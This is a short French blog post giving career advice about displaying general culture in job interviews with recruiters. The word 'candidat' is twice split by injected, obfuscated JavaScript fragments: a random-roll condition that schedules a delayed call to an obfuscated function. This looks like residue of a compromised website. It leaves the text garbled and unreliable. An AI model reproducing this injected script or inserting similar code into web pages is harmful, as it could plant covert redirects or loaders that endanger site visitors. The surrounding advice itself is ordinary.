Archives des tags : recruteur

Faut-il faire preuve de culture générale lors de ses oraux ?

La découverte par un recruteur du niveau de Culture Générale du candom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}idat est évidemment un facteur positif. Pouvoir se prévaloir d’une Culture Générale relève d’un équilibre dans sa vie personnelle et d’un niveau de curiosité qui ne peuvent que séduire un recruteur.  Mais elle doit se dévoiler avec à-propos et jamais avec ostentation.

 

La culture doit se découvrir au gré des questions du recruteur et ne doit jamais s’imposer de la part du candom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}idat. Si les questions ou les thèmes de l’entretien n’ouvrent pas l’espace propice à dévoiler ses connaissances, il est préférable de s’abstenir de toute exposition. En réalité pour qu’une Culture se révèle, il faut qu’un temps le permette au cours de l’entretien.

 

Car dans le cas contraire, non seulement les arguments peuvent s’avérer hors de propos mais le recruteur peut ressentir cet « étalage »  comme une agression personnelle face à une sujet que lui-même ne connait pas ou ne maîtrise pas.